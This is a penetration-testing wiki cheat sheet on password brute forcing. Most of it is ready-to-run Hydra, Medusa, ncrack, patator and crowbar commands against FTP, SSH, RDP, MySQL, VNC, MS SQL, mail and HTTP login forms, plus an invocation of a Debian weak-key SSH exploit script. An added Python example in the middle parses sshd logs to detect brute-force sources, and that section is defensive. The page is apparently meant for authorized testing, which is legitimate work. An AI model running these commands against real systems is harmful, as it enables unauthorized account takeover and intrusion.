Brute forcing

Penetration Testing Wiki

Hydra

Attack FTP:

hydra -l $USERNAME -P /usr/share/wordlists/nmap.lst -f $IP ftp -V

Attack POP3:

hydra -l $USERNAME -P /usr/share/wordlists/nmap.lst -f $IP pop3 -V

Attack SMTP:

hydra -P /usr/share/wordlists/nmap.lst $IP smtp -V

Attack SNMP:

hydra -P /usr/share/wordlists/snmp.txt -v $IP snmp

Attack HTTP form:

hydra -l $USERNAME -I -P cewl.txt $IP http-post-form "/$SCRIPT_PATH:Action=Login&User=^USER^&Password=^PASS^:Login failed" -V

Attack SSH (OpenSSH):

hydra -l root -P /usr/share/wordlists/rockyou.txt $IP ssh
hydra -t 4 -L users.txt -P pass.txt -M targets.txt ssh
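
Seen from the defending side, the two SSH runs above leave different traces in the sshd log: one account tried with many passwords, or many accounts tried from one source. The following is an added example, not part of the original wiki, that classifies failed-login lines accordingly; the thresholds, host name and sample log lines are constructed assumptions.

```python
import re
from collections import defaultdict

# sshd's failed-password line; rsyslog may fold duplicates into
# "message repeated N times: [ ... ]", so N is captured when present.
FAILED = re.compile(
    r"sshd\[\d+\]: (?:message repeated (?P<n>\d+) times: \[ )?"
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+"
)

def classify(lines, min_failures=5, many_users=3):
    """Return {source_ip: verdict} for sources at or above min_failures."""
    failures = defaultdict(int)   # ip -> total failed attempts
    users = defaultdict(set)      # ip -> distinct account names tried
    for line in lines:
        m = FAILED.search(line)
        if not m:
            continue
        failures[m["ip"]] += int(m["n"] or 1)
        users[m["ip"]].add(m["user"])
    verdicts = {}
    for ip, count in failures.items():
        if count < min_failures:
            continue  # below threshold: more likely a mistyped password
        if len(users[ip]) >= many_users:
            verdicts[ip] = "multi-account guessing"
        else:
            verdicts[ip] = "single-account guessing"
    return verdicts

# Constructed sample log (documentation-range addresses, hypothetical host name).
PREFIX = "Mar  3 10:00:0{} host sshd[{}]: "
SAMPLE_LOG = (
    [PREFIX.format(i, 1000 + i) + "Failed password for root from 203.0.113.7 port 4011{} ssh2".format(i)
     for i in range(3)]
    + [PREFIX.format(3, 1003) + "message repeated 3 times: [ Failed password for root from 203.0.113.7 port 40113 ssh2]"]
    + [PREFIX.format(i, 1010 + i) + "Failed password for invalid user {} from 198.51.100.9 port 5100{} ssh2".format(u, i)
       for i, u in enumerate(["admin", "test", "oracle", "git", "deploy"])]
    + [PREFIX.format(8, 1020) + "Failed password for alice from 192.0.2.44 port 60001 ssh2",
       PREFIX.format(9, 1021) + "Accepted password for alice from 192.0.2.44 port 60002 ssh2"]
)

if __name__ == "__main__":
    for ip, verdict in classify(SAMPLE_LOG).items():
        print(ip, verdict)
```

The single failed login from 192.0.2.44 stays below the threshold and is not reported, while the folded "message repeated" line still counts toward the total for 203.0.113.7.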

Attack MySQL:

hydra -l root -P /usr/share/wordlists/rockyou.txt $IP mysql

Attack VNC:

hydra -P /usr/share/wordlists/rockyou.txt $IP -t 1 vnc

Check credentials for MS SQL:

hydra -l sa -p PASSWORD mssql://$IP

Check credentials for MS SQL on different port:

hydra -l sa -p password mssql://$IP:27900

Medusa

Attack HTTP Basic authentication against phpmyadmin directory:

medusa -h $IP -u admin -P /usr/share/wordlists/megacorp.txt -m DIR:/phpmyadmin/ -t 10 -M http

Attack FTP:

medusa -u kevin -P /usr/share/wordlists/megacorp-last.txt -h $IP -M ftp -t 10

List available modules:

ls /usr/lib/medusa/modules/

Other tools for brute forcing:

ncrack -vv --user Administrator -P /usr/share/wordlists/megacorp.txt rdp://$IP
patator ftp_login host=$IP user=FILE0 password=FILE1 0=logins.txt 1=passwords.txt -x ignore:mesg='Login incorrect.' -x ignore,reset,retry:code=500
./crowbar.py -b rdp -s $IP/24 -U /root/Desktop/userlist -C /root/Desktop/passlist -d
./crowbar.py -b sshkey -s $IP/24 -u root -k /root/.ssh/ -d
python CVE-2008-0166-Debian-ssh-PRNG.py TOOLS/rsa/2048 $IP root 22 6